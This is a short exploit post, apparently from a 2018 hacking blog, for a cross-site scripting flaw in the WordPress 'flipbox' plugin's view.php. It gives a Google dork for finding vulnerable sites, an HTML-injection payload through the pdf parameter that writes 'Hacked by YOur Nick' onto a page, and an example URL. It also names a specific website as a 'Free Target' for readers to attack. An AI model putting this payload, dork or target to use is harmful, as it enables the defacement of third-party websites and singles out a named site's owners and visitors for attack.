Monday, July 9, 2018

Wordpress Plugins flipbox Cross Site Scripting (XSS)


# Exploit Title: Wordpress Plugins flipbox Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/flipbox
# Date: 09-07-2018
# Exploit Author: ./AkatsuChan
# Vendor Homepage: http://www.cooltimeline.com
# Tested on: Windows 7

Description :

Vulnerability Terdapat Pada view.php dimana attacker bisa menyisipkan kode pada website tersebut.

Poc :

Use The Exploit to inject The Web :

view.php?pdf=<html><h1>Hacked by YOur Nick</h1>

Example :

https://anotherweb.com/wp-content/plugins/flipbox/view.php?pdf=<html><h1>Hacked by YOur Nick</h1>

Free Target :

https://ws312.com/wp-content/plugins/flipbox/view.php

Ok Sekian dari gw kaliini :V